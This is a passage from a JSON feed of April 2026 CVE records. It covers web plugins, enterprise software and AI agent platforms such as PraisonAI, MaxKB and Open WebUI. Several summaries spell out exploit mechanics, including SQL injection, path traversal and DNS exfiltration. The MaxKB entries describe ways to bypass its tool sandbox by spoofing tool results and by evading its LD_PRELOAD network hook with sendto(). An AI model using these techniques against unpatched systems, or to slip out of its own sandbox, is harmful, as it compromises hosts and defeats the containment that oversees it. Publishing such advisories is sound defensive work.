issue.","cvss":null,"cvss_version":null,"cvss_v2":null,"cvss_v3":null,"cvss_v4":null,"epss":0.00029,"ranking_epss":0.08028,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://lists.apache.org/thread/sob643s5lztov7x579j8o0c444t36n6b","http://www.openwall.com/lists/oss-security/2026/04/14/3"],"published_time":"2026-04-14T09:16:35","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-31923","summary":"Cleartext Transmission of Sensitive Information vulnerability in Apache APISIX.\n\nThis can occur due to `ssl_verify` in openid-connect plugin configuration being set to false by default.\nThis issue affects Apache APISIX: from 0.7 through 3.15.0.\n\nUsers are recommended to upgrade to version 3.16.0, which fixes the issue.","cvss":7.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.5,"cvss_v4":null,"epss":0.00013,"ranking_epss":0.02003,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://lists.apache.org/thread/0pjs72l7qj83j3srw1l1toyj24bsgkds","http://www.openwall.com/lists/oss-security/2026/04/14/1"],"published_time":"2026-04-14T09:16:35","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-31924","summary":"Cleartext Transmission of Sensitive Information vulnerability in Apache APISIX.\n\ntencent-cloud-cls log export uses plaintext HTTP\nThis issue affects Apache APISIX: from 2.99.0 through 3.15.0.\n\nUsers are recommended to upgrade to version 3.16.0, which fixes the issue.","cvss":5.3,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":5.3,"cvss_v4":null,"epss":0.00013,"ranking_epss":0.02003,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://lists.apache.org/thread/sqxjjlt87c1q28db28ztdxylm5pgwohq","http://www.openwall.com/lists/oss-security/2026/04/14/2"],"published_time":"2026-04-14T09:16:35","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2025-40745","summary":"A vulnerability has been identified in Siemens Software Center (All versions < 
V3.5.8.2), Simcenter 3D (All versions < V2506.6000), Simcenter Femap (All versions < V2506.0002), Simcenter STAR-CCM+ (All versions < V2602), Solid Edge SE2025 (All versions < V225.0 Update 13), Solid Edge SE2026 (All versions < V226.0 Update 04), Tecnomatix Plant Simulation (All versions < V2504.0008). Affected applications do not properly validate client certificates to connect to Analytics Service endpoint. This could allow an unauthenticated remote attacker to perform man-in-the-middle attacks.","cvss":6.3,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":3.7,"cvss_v4":6.3,"epss":0.00017,"ranking_epss":0.04095,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://cert-portal.siemens.com/productcert/html/ssa-981622.html"],"published_time":"2026-04-14T09:16:34","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-24032","summary":"A vulnerability has been identified in SINEC NMS (All versions < V4.0 SP3 with UMC). The affected application contains an authentication weakness due to insufficient validation of user identity in the UMC component.\r\nThis could allow an unauthenticated remote attacker to bypass authentication and gain unauthorized access to the application. (ZDI-CAN-27564)","cvss":6.9,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":7.3,"cvss_v4":6.9,"epss":0.0005,"ranking_epss":0.15482,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://cert-portal.siemens.com/productcert/html/ssa-801704.html"],"published_time":"2026-04-14T09:16:34","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-2582","summary":"The Germanized for WooCommerce plugin for WordPress is vulnerable to arbitrary shortcode execution via 'account_holder' parameter in all versions up to, and including, 3.20.5. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. 
This makes it possible for unauthenticated attackers to execute arbitrary shortcodes.","cvss":6.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.5,"cvss_v4":null,"epss":0.00086,"ranking_epss":0.2477,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://plugins.trac.wordpress.org/browser/woocommerce-germanized/tags/3.20.5/includes/gateways/direct-debit/class-wc-gzd-gateway-direct-debit.php#L214","https://plugins.trac.wordpress.org/browser/woocommerce-germanized/tags/3.20.5/includes/gateways/direct-debit/class-wc-gzd-gateway-direct-debit.php#L982","https://www.wordfence.com/threat-intel/vulnerabilities/id/9e6837ad-576f-4c25-9540-6144ddc8630e?source=cve"],"published_time":"2026-04-14T07:16:06","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-3017","summary":"The Smart Post Show – Post Grid, Post Carousel & Slider, and List Category Posts plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 3.0.12 via deserialization of untrusted input in the import_shortcodes() function. This makes it possible for authenticated attackers, with Administrator-level access and above, to inject a PHP Object. No known POP chain is present in the vulnerable software, which means this vulnerability has no impact unless another plugin or theme containing a POP chain is installed on the site. 
If a POP chain is present via an additional plugin or theme installed on the target system, it may allow the attacker to perform actions like delete arbitrary files, retrieve sensitive data, or execute code depending on the POP chain present.","cvss":7.2,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.2,"cvss_v4":null,"epss":0.00039,"ranking_epss":0.1158,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://plugins.trac.wordpress.org/changeset/3490703/post-carousel","https://www.wordfence.com/threat-intel/vulnerabilities/id/45690747-0b8d-4e2e-8dd0-07c12791c064?source=cve"],"published_time":"2026-04-14T06:16:05","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-4059","summary":"The ShopLentor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the woolentor_quickview_button shortcode's button_text attribute in all versions up to, and including, 3.3.5. This is due to insufficient input sanitization and missing output escaping on user-supplied shortcode attributes. 
This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","cvss":6.4,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.4,"cvss_v4":null,"epss":0.00036,"ranking_epss":0.10551,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://plugins.trac.wordpress.org/browser/woolentor-addons/tags/3.3.4/includes/modules/quickview/includes/classes/Frontend/Shortcode.php#L61","https://plugins.trac.wordpress.org/browser/woolentor-addons/tags/3.3.4/includes/modules/quickview/includes/templates/quickview-button.php#L1","https://plugins.trac.wordpress.org/browser/woolentor-addons/trunk/includes/modules/quickview/includes/classes/Frontend/Shortcode.php#L61","https://plugins.trac.wordpress.org/changeset/3493664/woolentor-addons/trunk/includes/modules/quickview/includes/classes/Frontend/Shortcode.php","https://plugins.trac.wordpress.org/changeset?old_path=%2Fwoolentor-addons/tags/3.3.5&new_path=%2Fwoolentor-addons/tags/3.3.6","https://ti.wordfence.io/vendors/patch/1796/download","https://www.wordfence.com/threat-intel/vulnerabilities/id/fdf0b13e-154c-4007-bfc2-5346d906f7ca?source=cve"],"published_time":"2026-04-14T04:17:18","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-4479","summary":"The WholeSale Products Dynamic Pricing Management WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 1.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. 
This only affects multi-site installations and installations where unfiltered_html has been disabled.","cvss":4.4,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":4.4,"cvss_v4":null,"epss":0.00022,"ranking_epss":0.05809,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://plugins.trac.wordpress.org/browser/wholesale-products-dynamic-pricing-management-woocommerce/trunk/class-main.php#L114","https://www.wordfence.com/threat-intel/vulnerabilities/id/6b0382e2-e029-4e19-981c-6dc570e182f0?source=cve"],"published_time":"2026-04-14T04:17:18","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-40315","summary":"PraisonAI is a multi-agent teams system. Prior to 4.5.133, there is an SQL identifier injection vulnerability in SQLiteConversationStore where the table_prefix configuration value is directly concatenated into SQL queries via f-strings without any validation or sanitization. Since SQL identifiers cannot be safely parameterized, an attacker who controls the table_prefix value (e.g., through from_yaml or from_dict configuration input) can inject arbitrary SQL fragments that alter query structure. This enables unauthorized data access, such as reading internal SQLite tables like sqlite_master, and manipulation of query results through techniques like UNION-based injection. The vulnerability propagates from configuration input in config.py, through factory.py, to the SQL query construction in sqlite.py. Exploitation requires the ability to influence configuration input, and successful exploitation leads to internal schema disclosure and full query result tampering. 
This issue has been fixed in version 4.5.133.","cvss":7.2,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":7.2,"epss":0.00022,"ranking_epss":0.05886,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/MervinPraison/PraisonAI/commit/0accebb2e3c3ec2fca66bbea0444fb7a35f0b4ef","https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-x783-xp3g-mqhp","https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-x783-xp3g-mqhp"],"published_time":"2026-04-14T04:17:16","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-40313","summary":"PraisonAI is a multi-agent teams system. In versions 4.5.139 and below, the GitHub Actions workflows are vulnerable to ArtiPACKED attack, a known credential leakage vector caused by using actions/checkout without setting persist-credentials: false. By default, actions/checkout writes the GITHUB_TOKEN (and sometimes ACTIONS_RUNTIME_TOKEN) into the .git/config file for persistence, and if any subsequent workflow step uploads artifacts (build outputs, logs, test results, etc.), these tokens can be inadvertently included. Since PraisonAI is a public repository, any user with read access can download these artifacts and extract the leaked tokens, potentially enabling an attacker to push malicious code, poison releases and PyPI/Docker packages, steal repository secrets, and execute a full supply chain compromise affecting all downstream users. The issue spans numerous workflow and action files across .github/workflows/ and .github/actions/. 
This issue has been fixed in version 4.5.140.","cvss":9.1,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":9.1,"cvss_v4":null,"epss":0.00029,"ranking_epss":0.08181,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-3959-6v5q-45q2","https://thehackernews.com/2024/08/github-vulnerability-artipacked-exposes.html","https://unit42.paloaltonetworks.com/github-repo-artifacts-leak-tokens"],"published_time":"2026-04-14T04:17:13","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-40288","summary":"PraisonAI is a multi-agent teams system. In versions below 4.5.139 of PraisonAI and 1.5.140 of praisonaiagents, the workflow engine is vulnerable to arbitrary command and code execution through untrusted YAML files. When praisonai workflow run <file.yaml> loads a YAML file with type: job, the JobWorkflowExecutor in job_workflow.py processes steps that support run: (shell commands via subprocess.run()), script: (inline Python via exec()), and python: (arbitrary Python script execution)—all without any validation, sandboxing, or user confirmation. The affected code paths include action_run() in workflow.py and _exec_shell(), _exec_inline_python(), and _exec_python_script() in job_workflow.py. An attacker who can supply or influence a workflow YAML file (particularly in CI pipelines, shared repositories, or multi-tenant deployment environments) can achieve full arbitrary command execution on the host system, compromising the machine and any accessible data or credentials. 
This issue has been fixed in versions 4.5.139 of PraisonAI and 1.5.140 of praisonaiagents.","cvss":9.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":9.8,"cvss_v4":null,"epss":0.00066,"ranking_epss":0.20268,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-vc46-vw85-3wvm"],"published_time":"2026-04-14T04:17:12","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-40289","summary":"PraisonAI is a multi-agent teams system. In versions below 4.5.139 of PraisonAI and 1.5.140 of praisonaiagents, the browser bridge (praisonai browser start) is vulnerable to unauthenticated remote session hijacking due to missing authentication and a bypassable origin check on its /ws WebSocket endpoint. The server binds to 0.0.0.0 by default and only validates the Origin header when one is present, meaning any non-browser client that omits the header is accepted without restriction. An unauthenticated network attacker can connect, send a start_session message, and the server will route it to the first idle browser-extension WebSocket (effectively hijacking that session) and then broadcast all resulting automation actions and outputs back to the attacker. This enables unauthorized remote control of connected browser automation sessions, leakage of sensitive page context and automation results, and misuse of model-backed browser actions in any environment where the bridge is network-reachable. 
This issue has been fixed in versions 4.5.139 of PraisonAI and 1.5.140 of praisonaiagents.","cvss":9.1,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":9.1,"cvss_v4":null,"epss":0.00055,"ranking_epss":0.17268,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-8x8f-54wf-vv92"],"published_time":"2026-04-14T04:17:12","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-40287","summary":"PraisonAI is a multi-agent teams system. Versions 4.5.138 and below are vulnerable to arbitrary code execution through automatic, unsanitized import of a tools.py file from the current working directory. Components including call.py (import_tools_from_file()), tool_resolver.py (_load_local_tools()), and CLI tool-loading paths blindly import ./tools.py at startup without any validation, sandboxing, or user confirmation. An attacker who can place a malicious tools.py in the directory where PraisonAI is launched (such as through a shared project, cloned repository, or writable workspace) achieves immediate arbitrary Python code execution in the host environment. This compromises the full PraisonAI process, the host system, and any connected data or credentials. 
This issue has been fixed in version 4.5.139.","cvss":8.4,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":8.4,"cvss_v4":null,"epss":0.00023,"ranking_epss":0.06212,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-g985-wjh9-qxxc","https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-g985-wjh9-qxxc"],"published_time":"2026-04-14T04:17:11","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-1607","summary":"The Surbma | Booking.com Shortcode plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's `surbma-bookingcom` shortcode in all versions up to, and including, 2.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","cvss":6.4,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.4,"cvss_v4":null,"epss":0.00029,"ranking_epss":0.08061,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://plugins.trac.wordpress.org/browser/surbma-bookingcom-shortcode/tags/2.0/surbma-bookingcom-shortcode.php#L34","https://www.wordfence.com/threat-intel/vulnerabilities/id/01280afb-4745-4f36-823e-ed794bb3353a?source=cve"],"published_time":"2026-04-14T04:17:00","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6264","summary":"A critical vulnerability in the Talend JobServer and Talend Runtime allows unauthenticated remote code execution via the JMX monitoring port. The attack vector is the JMX monitoring port of the Talend JobServer. The vulnerability can be mitigated for the Talend JobServer by requiring TLS client authentication for the monitoring port; however, the patch must be applied for full mitigation. 
For Talend ESB Runtime, the vulnerability can be mitigated by disabling the JobServer JMX monitoring port, which is disabled by default from the R2024-07-RT patch.","cvss":9.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":9.8,"cvss_v4":null,"epss":0.00237,"ranking_epss":0.46766,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://community.qlik.com/t5/Official-Support-Articles/Critical-Security-fix-for-the-Qlik-Talend-JobServer-and-Talend/tac-p/2541974"],"published_time":"2026-04-14T03:16:09","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-34984","summary":"External Secrets Operator reads information from a third-party service and automatically injects the values as Kubernetes Secrets. Versions 2.2.0 and below contain a vulnerability in runtime/template/v2/template.go where the v2 template engine removes env and expandenv from Sprig's TxtFuncMap() but leaves the getHostByName function accessible to user-controlled templates. Since ESO executes templates within the controller process, an attacker who can create or update templated ExternalSecret resources can invoke controller-side DNS lookups using secret-derived values. This creates a DNS exfiltration primitive, allowing fetched secret material to be leaked via DNS queries without requiring direct outbound network access from the attacker's workload. The impact is a confidentiality issue, particularly in environments where untrusted or lower-trust users can author templated ExternalSecret resources and the controller has DNS resolution capability. 
This issue has been fixed in version 2.3.0.","cvss":7.1,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":7.1,"epss":0.0004,"ranking_epss":0.11863,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/external-secrets/external-secrets/commit/6800989bdc12782ca2605d3b8bf7f2876a16551a","https://github.com/external-secrets/external-secrets/releases/tag/v2.3.0","https://github.com/external-secrets/external-secrets/security/advisories/GHSA-r2pg-r6h7-crf3"],"published_time":"2026-04-14T03:16:08","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-4388","summary":"The Form Maker by 10Web plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Matrix field (Text Box input type) in form submissions in all versions up to, and including, 1.15.40. This is due to insufficient input sanitization (`sanitize_text_field` strips tags but not quotes) and missing output escaping when rendering submission data in the admin Submissions view. 
This makes it possible for unauthenticated attackers to inject arbitrary JavaScript through a form submission that executes in the browser of an administrator who views the submission details.","cvss":7.2,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.2,"cvss_v4":null,"epss":0.0007,"ranking_epss":0.21347,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://plugins.trac.wordpress.org/browser/form-maker/tags/1.15.37/admin/views/FormMakerSubmits.php#L166","https://plugins.trac.wordpress.org/browser/form-maker/tags/1.15.37/admin/views/FormMakerSubmits.php#L169","https://plugins.trac.wordpress.org/browser/form-maker/tags/1.15.37/frontend/models/form_maker.php#L2352","https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3501693%40form-maker%2Ftrunk&old=3492680%40form-maker%2Ftrunk&sfp_email=&sfph_mail=","https://www.wordfence.com/threat-intel/vulnerabilities/id/197449f5-9304-49df-9261-a354145fc00e?source=cve"],"published_time":"2026-04-14T03:16:08","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6227","summary":"The BackWPup plugin for WordPress is vulnerable to Local File Inclusion via the `block_name` parameter of the `/wp-json/backwpup/v1/getblock` REST endpoint in all versions up to, and including, 5.6.6 due to a non-recursive `str_replace()` sanitization of path traversal sequences. This makes it possible for authenticated attackers, with Administrator-level access and above, to include arbitrary PHP files on the server via crafted traversal sequences (e.g., `....//`), which can be leveraged to read sensitive files such as `wp-config.php` or achieve remote code execution in certain configurations. 
Administrators have the ability to grant individual users permission to handle backups, which may then allow lower-level users to exploit this vulnerability.","cvss":7.2,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.2,"cvss_v4":null,"epss":0.00312,"ranking_epss":0.54398,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://plugins.trac.wordpress.org/browser/backwpup/tags/5.6.5/inc/Utils/BackWPupHelpers.php#L23","https://plugins.trac.wordpress.org/browser/backwpup/tags/5.6.5/inc/Utils/BackWPupHelpers.php#L40","https://plugins.trac.wordpress.org/browser/backwpup/tags/5.6.5/src/Frontend/API/Rest.php#L52","https://plugins.trac.wordpress.org/browser/backwpup/trunk/inc/Utils/BackWPupHelpers.php#L23","https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3490642%40backwpup%2Ftrunk&old=3475739%40backwpup%2Ftrunk&sfp_email=&sfph_mail=#file26","https://www.wordfence.com/threat-intel/vulnerabilities/id/084e3f78-275b-4692-9cce-e17074f55cfb?source=cve"],"published_time":"2026-04-14T03:16:08","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-39419","summary":"MaxKB is an open-source AI assistant for enterprise. In versions 2.7.1 and below, an authenticated user can bypass sandbox result validation and spoof tool execution results by exploiting Python frame introspection to read the wrapper's UUID from its bytecode constants, then writing a forged result directly to file descriptor 1 (bypassing stdout redirection). By calling sys.exit(0), the attacker terminates the wrapper before it prints the legitimate output, causing the MaxKB service to parse and trust the spoofed response as the genuine tool result. 
This issue has been fixed in version 2.8.0.","cvss":3.1,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":3.1,"cvss_v4":null,"epss":0.00047,"ranking_epss":0.14278,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/1Panel-dev/MaxKB/commit/38c4cfecd065293ede0437f6fa76cf0116591d25","https://github.com/1Panel-dev/MaxKB/releases/tag/v2.8.0","https://github.com/1Panel-dev/MaxKB/security/advisories/GHSA-f3c8-p474-xwfv"],"published_time":"2026-04-14T02:16:05","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-39425","summary":"MaxKB is an open-source AI assistant for enterprise. Versions 2.7.1 and below contain a Stored Cross-Site Scripting (XSS) vulnerability that allows authenticated users to inject arbitrary HTML and JavaScript into the Application prologue (Opening Remarks) field by wrapping malicious payloads in <html_rander> tags. The backend fails to sanitize or encode HTML entities in the prologue field when applications are created or updated via the /admin/api/workspace/{workspace_id}/application endpoint, storing the raw payload directly in the database. The frontend then renders this content using an innerHTML-equivalent mechanism, trusting <html_rander>-wrapped content to be safe, which enables persistent DOM-based Stored XSS execution against any visitor who opens the affected chatbot interface. Exploitation can lead to session hijacking, unauthorized actions performed on behalf of victims (such as deleting workspaces or applications), and sensitive data exposure. 
This issue has been fixed in version 2.8.0.","cvss":5.1,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":5.1,"epss":0.00069,"ranking_epss":0.21245,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/1Panel-dev/MaxKB/releases/tag/v2.8.0","https://github.com/1Panel-dev/MaxKB/security/advisories/GHSA-3rq5-pgm7-pvp4"],"published_time":"2026-04-14T02:16:05","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-39426","summary":"MaxKB is an open-source AI assistant for enterprise. Versions 2.7.1 and below contain a Stored Cross-Site Scripting (XSS) vulnerability where the frontend's MdRenderer.vue component parses custom <iframe_render> tags from LLM responses or Application Prologue configurations, bypassing standard Markdown sanitization and XSS filtering. The unsanitized HTML content is passed to the IframeRender.vue component, which renders it directly into an <iframe> via the srcdoc attribute configured with sandbox=\"allow-scripts allow-same-origin\". This can be a dangerous combination, allowing injected scripts to escape the iframe and execute JavaScript in the parent window using window.parent. Since the Prologue is rendered for any user visiting an application's chat interface, this results in a high-impact Stored XSS that can lead to session hijacking, unauthorized actions, and sensitive data exposure. 
This issue has been fixed in version 2.8.0.","cvss":5.1,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":5.1,"epss":0.00047,"ranking_epss":0.14223,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/1Panel-dev/MaxKB/releases/tag/v2.8.0","https://github.com/1Panel-dev/MaxKB/security/advisories/GHSA-q2qg-43vq-f2wv"],"published_time":"2026-04-14T02:16:05","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-4352","summary":"The JetEngine plugin for WordPress is vulnerable to SQL Injection via the Custom Content Type (CCT) REST API search endpoint in all versions up to, and including, 3.8.6.1. This is due to the `_cct_search` parameter being interpolated directly into a SQL query string via `sprintf()` without sanitization or use of `$wpdb->prepare()`. WordPress REST API's `wp_unslash()` call on `$_GET` strips the `wp_magic_quotes()` protection, allowing single-quote-based injection. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. The Custom Content Types module must be enabled with at least one CCT configured with a public REST GET endpoint for exploitation.","cvss":7.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.5,"cvss_v4":null,"epss":0.00064,"ranking_epss":0.1989,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://crocoblock.com/plugins/jetengine/","https://www.wordfence.com/threat-intel/vulnerabilities/id/29a5701f-92f7-4a02-a990-b189a381cff5?source=cve"],"published_time":"2026-04-14T02:16:05","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-4365","summary":"The LearnPress plugin for WordPress is vulnerable to unauthorized data deletion due to a missing capability check on the `delete_question_answer()` function in all versions up to, and including, 4.3.2.8. 
The plugin exposes a `wp_rest` nonce in public frontend HTML (`lpData`) to unauthenticated visitors, and uses that nonce as the only security gate for the `lp-load-ajax` AJAX dispatcher. The `delete_question_answer` action has no capability or ownership check. This makes it possible for unauthenticated attackers to delete any quiz answer option by sending a crafted POST request with a publicly available nonce.","cvss":9.1,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":9.1,"cvss_v4":null,"epss":0.00054,"ranking_epss":0.167,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://plugins.trac.wordpress.org/browser/learnpress/trunk/inc/Ajax/AbstractAjax.php#L33","https://plugins.trac.wordpress.org/browser/learnpress/trunk/inc/Ajax/EditQuestionAjax.php#L285","https://plugins.trac.wordpress.org/browser/learnpress/trunk/inc/class-lp-assets.php#L177","https://www.wordfence.com/threat-intel/vulnerabilities/id/021bd566-1663-46ba-a616-ab554b691cbb?source=cve"],"published_time":"2026-04-14T02:16:05","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-34225","summary":"Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Versions 0.7.2 and below contain a Blind Server Side Request Forgery in the functionality that allows editing an image via a prompt. The affected function performs a GET request to a user-provided URL with no restriction on the domain, allowing the local address space to be accessed. Since the SSRF is blind (the response cannot be read), the primary impact is port scanning of the local network, as whether a port is open can be determined based on whether the GET request succeeds or fails. These response differentials can be automated to iterate through the entire port range and identify open ports. 
If the service running on an open port can be inferred, an attacker may be able to interact with it in a meaningful way, provided the service offers state-changing GET request endpoints. This issue was unresolved at the time of publication.","cvss":4.3,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":4.3,"cvss_v4":null,"epss":0.00025,"ranking_epss":0.06878,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/open-webui/open-webui/security/advisories/GHSA-jgx9-jr5x-mvpv","https://github.com/open-webui/open-webui/security/advisories/GHSA-jgx9-jr5x-mvpv"],"published_time":"2026-04-14T02:16:04","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-39423","summary":"MaxKB is an open-source AI assistant for enterprise. Versions 2.7.1 and below contain an Eval Injection vulnerability in the Markdown rendering engine that allows any user capable of interacting with the AI chat interface to execute arbitrary JavaScript in the browsers of other users, including administrators, resulting in Stored Cross-Site Scripting (XSS). This issue has been fixed in version 2.8.0.","cvss":6.9,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":6.9,"epss":0.00044,"ranking_epss":0.13361,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/1Panel-dev/MaxKB/commit/34fb95bde9574c5b3a734ab00c7f29b9e7d32669","https://github.com/1Panel-dev/MaxKB/releases/tag/v2.8.0","https://github.com/1Panel-dev/MaxKB/security/advisories/GHSA-462x-99gf-mp79"],"published_time":"2026-04-14T01:16:05","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-39424","summary":"MaxKB is an open-source AI assistant for enterprise. In versions 2.7.1 and below, the chat export feature is vulnerable to Improper Neutralization of Formula Elements in a CSV File. 
When an administrator exports the application chat history to an Excel file (.xlsx) via the /admin/api/workspace/{workspace_id}/application/{application_id}/chat/export endpoint, strings starting with formula characters are written directly without proper sanitization. Opening this file in spreadsheet applications like Microsoft Excel can lead to Arbitrary Code Execution (RCE) on the administrator's workstation via Dynamic Data Exchange (DDE). The issue is a variant of CVE-2025-4546, which fixed the exact same pattern in apps/dataset/serializers/document_serializers.py but missed the application chat export sink. This issue has been fixed in version 2.8.0.","cvss":5.3,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":5.3,"epss":0.00061,"ranking_epss":0.18876,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/1Panel-dev/MaxKB/commit/24cd68acae5f726eed828e2ac801827a2a70536f","https://github.com/1Panel-dev/MaxKB/releases/tag/v2.8.0","https://github.com/1Panel-dev/MaxKB/security/advisories/GHSA-rr4r-7cj2-29vp"],"published_time":"2026-04-14T01:16:05","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-34262","summary":"Information Disclosure Vulnerability in SAP HANA Cockpit and HANA Database Explorer","cvss":5.0,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":5.0,"cvss_v4":null,"epss":0.00025,"ranking_epss":0.06878,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://me.sap.com/notes/3730639","https://url.sap/sapsecuritypatchday"],"published_time":"2026-04-14T01:16:04","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-34264","summary":"During authorization checks in SAP Human Capital Management for SAP S/4HANA, the system returns specific messages. Due to this, an authenticated user with low privileges could guess and enumerate the content shown, beyond their authorized scope. 
This leads to disclosure of sensitive information causing a high impact on confidentiality, while integrity and availability are unaffected.","cvss":6.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.5,"cvss_v4":null,"epss":0.00031,"ranking_epss":0.08605,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://me.sap.com/notes/3680767","https://url.sap/sapsecuritypatchday"],"published_time":"2026-04-14T01:16:04","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-39418","summary":"MaxKB is an open-source AI assistant for enterprise. In versions 2.7.1 and below, sandbox network protection can be bypassed by using socket.sendto() with the MSG_FASTOPEN flag. This allows an authenticated user with tool-editing permissions to reach internal services that are explicitly blocked by the sandbox's banned hosts configuration. MaxKB's sandbox uses LD_PRELOAD to hook the connect() function and block connections to banned IPs, but Linux's sendto() with the MSG_FASTOPEN flag can establish TCP connections directly through the kernel without ever calling connect(), completely bypassing the IP validation. Although sendto is listed in the syscall() wrapper, this is ineffective because glibc invokes the kernel syscall directly rather than routing through the hooked syscall() function. This issue has been fixed in version 